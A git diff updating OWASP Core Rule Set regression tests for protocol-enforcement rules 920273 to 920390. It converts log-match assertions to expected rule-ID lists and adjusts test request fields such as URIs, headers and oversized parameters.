no_log_contains: "id \"920273\"" + log: + no_expect_ids: [920273] - test_id: 5 stages: - input: @@ -70,4 +73,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920273\"" + log: + expect_ids: [920273] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml index d564f97dd..bcd73842f 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml @@ -1,27 +1,25 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920274 tests: - - # Apache will just error on this and return 400 - # as a result we look for forbidden or 400 - # In the future FTW should support OR versus AND output - # https://github.com/coreruleset/ftw/issues/19 - test_id: 1 + - test_id: 1 + desc: | + Apache will just error on this and return 400, as a result we look for forbidden or 400. + In the future FTW should support OR versus AND output. + https://github.com/coreruleset/ftw/issues/19 stages: - input: dest_addr: "127.0.0.1" port: 80 - uri: "/?test=test1" + uri: "/get?test=test1" headers: User-Agent: "OWASP CRS test agent" - Host: "localhost" + Host: "localhost%1F" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - status: 200 - # log_contains: "id \"920274\"" + status: 400 - test_id: 2 stages: - input: @@ -34,13 +32,14 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920274\"" + log: + no_expect_ids: [920274] - test_id: 3 stages: - input: dest_addr: "127.0.0.1" port: 80 - uri: "/?test=test1HI" + uri: "/get?test=test1HI" headers: User-Agent: "OWASP CRS test agent" Host: "localhost" @@ -48,13 +47,14 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920274\"" + log: + no_expect_ids: [920274] - test_id: 4 stages: - input: dest_addr: "127.0.0.1" port: 80 - uri: "/?test=test1HI" + uri: "/get?test=test1HI" headers: User-Agent: "OWASP CRS test agent" Host: "localhost" @@ -62,13 +62,14 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920274\"" + log: + expect_ids: [920274] - test_id: 5 stages: - input: dest_addr: "127.0.0.1" port: 80 - uri: "/?test=test1HI" + uri: "/get?test=test1HI" headers: User-Agent: "OWASP CRS test agent" Host: "localhost" @@ -76,7 +77,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920274\"" + log: + no_expect_ids: [920274] - test_id: 6 stages: - input: @@ -90,4 +92,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920274\"" + log: + no_expect_ids: [920274] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920275.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920275.yaml index f3a55b37f..3b3895419 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920275.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920275.yaml @@ -17,7 +17,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920275\"" + log: + expect_ids: [920275] - test_id: 2 stages: - input: @@ -31,7 +32,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920275\"" + log: + no_expect_ids: [920275] - test_id: 3 stages: - input: @@ -45,7 +47,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920275\"" + log: + no_expect_ids: [920275] - test_id: 4 stages: - input: @@ -59,7 +62,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920275\"" + log: + expect_ids: [920275] - test_id: 5 stages: - input: @@ -73,7 +77,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920275\"" + log: + no_expect_ids: [920275] - test_id: 6 stages: - input: @@ -87,4 +92,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920275\"" + log: + no_expect_ids: [920275] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml index 0ca416cf1..d418e938b 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920280 tests: - test_id: 1 @@ -16,7 +15,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" output: - log_contains: "id \"920280\"" + log: + expect_ids: [920280] - test_id: 2 stages: - input: @@ -29,7 +29,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920280\"" + log: + no_expect_ids: [920280] - test_id: 3 stages: - input: diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml index 26d77d142..04b8eac71 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920290 tests: - # Apache will block this with a 400 and it will @@ -33,7 +32,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920290\"" + log: + no_expect_ids: [920290] - test_id: 3 stages: - input: @@ -46,7 +46,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920290\"" + log: + no_expect_ids: [920290] - test_id: 4 desc: Status Page Test - test for empty host header stages: @@ -62,4 +63,5 @@ tests: # CRS prefers the use of encoded_request over raw_request. # Known reason is encoding issues with raw_request. output: - log_contains: "id \"920290\"" + log: + expect_ids: [920290] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml index e611b644f..ca5d84fbb 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml @@ -22,7 +22,8 @@ tests: version: HTTP/1.0 data: '' output: - log_contains: id "920300" + log: + expect_ids: [920300] - test_id: 2 desc: "OPTIONS request: exempt from requiring an Accept request header" stages: @@ -36,7 +37,8 @@ tests: uri: "*" version: "HTTP/1.1" output: - no_log_contains: "id \"920300\"" + log: + no_expect_ids: [920300] - test_id: 3 desc: "CONNECT request: exempt from requiring an Accept request header" stages: @@ -52,7 +54,8 @@ tests: uri: "www.coreruleset.org:80" version: "HTTP/1.1" output: - no_log_contains: "id \"920300\"" + log: + no_expect_ids: [920300] - test_id: 4 desc: "User-Agent containing AppleWebKit: exempt from requiring an Accept request header" stages: @@ -66,4 +69,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920300\"" + log: + no_expect_ids: [920300] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920310.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920310.yaml index eae7984c0..a801c0300 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920310.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920310.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920310 tests: - test_id: 1 @@ -17,7 +16,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920310\"" + log: + expect_ids: [920310] - test_id: 2 stages: - input: @@ -32,7 +32,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920310\"" + log: + no_expect_ids: [920310] - test_id: 3 stages: - input: @@ -45,7 +46,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920310\"" + log: + no_expect_ids: [920310] - test_id: 4 stages: - input: @@ -59,7 +61,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920310\"" + log: + expect_ids: [920310] - test_id: 5 stages: - input: @@ -73,7 +76,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920310\"" + log: + no_expect_ids: [920310] - test_id: 6 stages: - input: @@ -87,4 +91,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920310\"" + log: + no_expect_ids: [920310] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml index 55100c9b1..e61447696 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920311 tests: - test_id: 1 @@ -17,7 +16,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920311\"" + log: + expect_ids: [920311] - test_id: 2 stages: - input: @@ -32,7 +32,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920311\"" + log: + no_expect_ids: [920311] - test_id: 3 stages: - input: @@ -45,4 +46,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920311\"" + log: + no_expect_ids: [920311] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml index 49cdafa43..8c67cf883 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920320 tests: - test_id: 1 @@ -16,7 +15,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920320\"" + log: + expect_ids: [920320] - test_id: 2 stages: - input: @@ -29,4 +29,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920320\"" + log: + no_expect_ids: [920320] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml index fcd07d3db..e9384bee9 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920330 tests: - test_id: 1 @@ -17,7 +16,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920330\"" + log: + expect_ids: [920330] - test_id: 2 stages: - input: @@ -30,4 +30,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920330\"" + log: + no_expect_ids: [920330] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml index 34eac16be..24c669bcf 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920340 tests: - test_id: 1 @@ -16,10 +15,11 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" data: "xy" - stop_magic: true + autocomplete_headers: false version: "HTTP/1.1" output: - log_contains: "id \"920340\"" + log: + expect_ids: [920340] - test_id: 2 desc: "Status Page Test - POST request with body content, a non-zero Content-Length header, but no Content-Type header" stages: @@ -34,7 +34,8 @@ tests: method: "POST" uri: "/" data: "abc" - stop_magic: true + autocomplete_headers: false version: "HTTP/1.1" output: - log_contains: "id \"920340\"" + log: + expect_ids: [920340] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920341.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920341.yaml index ba967dafa..766159664 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920341.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920341.yaml @@ -20,9 +20,10 @@ tests: uri: "/pineapple" version: "HTTP/1.1" data: test - stop_magic: true + autocomplete_headers: false output: - log_contains: id "920341" + log: + expect_ids: [920341] - # Standard POST request with length and content-type test_id: 2 stages: @@ -40,7 +41,8 @@ tests: version: "HTTP/1.1" data: "{}" output: - no_log_contains: id "920341" + log: + no_expect_ids: [920341] - # Standard GET request (negative test) test_id: 3 stages: @@ -55,4 +57,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: id "920341" + log: + no_expect_ids: [920341] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920350.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920350.yaml index 93ee8c5bd..ebba3e733 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920350.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920350.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920350 tests: - test_id: 1 @@ -17,7 +16,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920350\"" + log: + expect_ids: [920350] - test_id: 2 stages: - input: @@ -31,7 +31,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920350\"" + log: + no_expect_ids: [920350] - test_id: 3 stages: - input: @@ -45,7 +46,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920350\"" + log: + expect_ids: [920350] - test_id: 4 stages: - input: @@ -59,7 +61,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920350\"" + log: + expect_ids: [920350] - test_id: 5 stages: - input: @@ -73,7 +76,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920350\"" + log: + expect_ids: [920350] - test_id: 6 stages: - input: @@ -87,7 +91,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920350\"" + log: + expect_ids: [920350] - test_id: 7 stages: - input: @@ -101,7 +106,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920350\"" + log: + no_expect_ids: [920350] - test_id: 8 stages: - input: @@ -115,4 +121,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920350\"" + log: + no_expect_ids: [920350] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml index 0a975a77f..3c3da7b19 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml @@ -23,4 +23,5 @@ tests: uri: "/?11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111=foo" version: HTTP/1.0 output: - log_contains: id "920360" + log: + expect_ids: [920360] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml index a22282207..f1f04baa6 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml @@ -22,4 +22,5 @@ tests: uri: /?foo=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 version: HTTP/1.0 output: - log_contains: id "920370" + log: + expect_ids: [920370] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml index a4a8bcd1d..2456b7a55 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml @@ -22,4 +22,5 @@ tests: uri: /?param1=1¶m2=1¶m3=1¶m4=1¶m5=1¶m6=1¶m7=1¶m8=1¶m9=1¶m10=1¶m11=1¶m12=1¶m13=1¶m14=1¶m15=1¶m16=1¶m17=1¶m18=1¶m19=1¶m20=1¶m21=1¶m22=1¶m23=1¶m24=1¶m25=1¶m26=1¶m27=1¶m28=1¶m29=1¶m30=1¶m31=1¶m32=1¶m33=1¶m34=1¶m35=1¶m36=1¶m37=1¶m38=1¶m39=1¶m40=1¶m41=1¶m42=1¶m43=1¶m44=1¶m45=1¶m46=1¶m47=1¶m48=1¶m49=1¶m50=1¶m51=1¶m52=1¶m53=1¶m54=1¶m55=1¶m56=1¶m57=1¶m58=1¶m59=1¶m60=1¶m61=1¶m62=1¶m63=1¶m64=1¶m65=1¶m66=1¶m67=1¶m68=1¶m69=1¶m70=1¶m71=1¶m72=1¶m73=1¶m74=1¶m75=1¶m76=1¶m77=1¶m78=1¶m79=1¶m80=1¶m81=1¶m82=1¶m83=1¶m84=1¶m85=1¶m86=1¶m87=1¶m88=1¶m89=1¶m90=1¶m91=1¶m92=1¶m93=1¶m94=1¶m95=1¶m96=1¶m97=1¶m98=1¶m99=1¶m100=1¶m101=1¶m102=1¶m103=1¶m104=1¶m105=1¶m106=1¶m107=1¶m108=1¶m109=1¶m110=1¶m111=1¶m112=1¶m113=1¶m114=1¶m115=1¶m116=1¶m117=1¶m118=1¶m119=1¶m120=1¶m121=1¶m122=1¶m123=1¶m124=1¶m125=1¶m126=1¶m127=1¶m128=1¶m129=1¶m130=1¶m131=1¶m132=1¶m133=1¶m134=1¶m135=1¶m136=1¶m137=1¶m138=1¶m139=1¶m140=1¶m141=1¶m142=1¶m143=1¶m144=1¶m145=1¶m146=1¶m147=1¶m148=1¶m149=1¶m150=1¶m151=1¶m152=1¶m153=1¶m154=1¶m155=1¶m156=1¶m157=1¶m158=1¶m159=1¶m160=1¶m161=1¶m162=1¶m163=1¶m164=1¶m165=1¶m166=1¶m167=1¶m168=1¶m169=1¶m170=1¶m171=1¶m172=1¶m173=1¶m174=1¶m175=1¶m176=1¶m177=1¶m178=1¶m179=1¶m180=1¶m181=1¶m182=1¶m183=1¶m184=1¶m185=1¶m186=1¶m187=1¶m188=1¶m189=1¶m190=1¶m191=1¶m192=1¶m193=1¶m194=1¶m195=1¶m196=1¶m197=1¶m198=1¶m199=1¶m200=1¶m201=1¶m202=1¶m203=1¶m204=1¶m205=1¶m206=1¶m207=1¶m208=1¶m209=1¶m210=1¶m211=1¶m212=1¶m213=1¶m214=1¶m215=1¶m216=1¶m217=1¶m218=1¶m219=1¶m220=1¶m221=1¶m222=1¶m223=1¶m224=1¶m225=1¶m226=1¶m227=1¶m228=1¶m229=1¶m230=1¶m231=1¶m232=1¶m233=1¶m234=1¶m235=1¶m236=1¶m237=1¶m238=1¶m239=1¶m240=1¶m241=1¶m242=1¶m243=1¶m244=1¶m245=1¶m246=1¶m247=1¶m248=1¶m249=1¶m250=1¶m251=1¶m252=1¶m253=1¶m254=1¶m255=1¶m256=1 version: HTTP/1.0 output: - log_contains: id "920380" + log: + expect_ids: [920380] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml index 4aa7d01a8..772e19de9 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml @@ -21,8 +21,9 @@ tests: User-Agent: "OWASP CRS test agent" method: POST port: 80 - uri: / + uri: /post version: HTTP/1.1 data: foo=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111